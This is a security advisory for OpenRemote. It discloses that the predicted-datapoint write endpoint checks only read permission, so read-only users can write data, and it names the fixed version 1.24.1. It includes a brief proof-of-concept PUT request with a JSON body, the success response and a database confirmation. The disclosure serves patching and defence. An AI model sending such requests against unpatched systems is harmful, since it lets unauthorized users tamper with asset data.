GHSA-xj53-j257-hxvg
OpenRemote read-only asset users can write predicted datapoints
Details
# Summary
The predicted datapoint write endpoint allows users with only `read:assets` privileges to write predicted datapoints.
The endpoint:
```text PUT /api/{realm}/asset/predicted/{assetId}/{attributeName} ```
accepts write requests from users lacking `write:assets`.
The implementation appears to check `READ_ASSETS` while performing a write operation through:
```java assetPredictedDatapointService.updateValues(...) ```
# PoC
A user was created with only:
```text read:assets ```
and without `write:assets`.
The following request succeeded:
```http PUT /api/master/asset/predicted/4Fr8Pcp7iDjrEmoSUFolvT/temperature ```
Request body:
```json [{"x":1779199999001,"y":1337}] ```
Response:
```text HTTP/2 204 ```
Database verification confirmed the datapoint was written successfully:
```text entity_id: 4Fr8Pcp7iDjrEmoSUFolvT attribute_name: temperature value: 1337 ```
# Impact
Users with read-only asset permissions can modify predicted datapoints for assets.
Are you affected?
Enter the version of the package you're using.
Affected packages
0 Fixed in: 1.24.1 # pom.xml: bump <version>1.24.1</version> for io.openremote:openremote-manager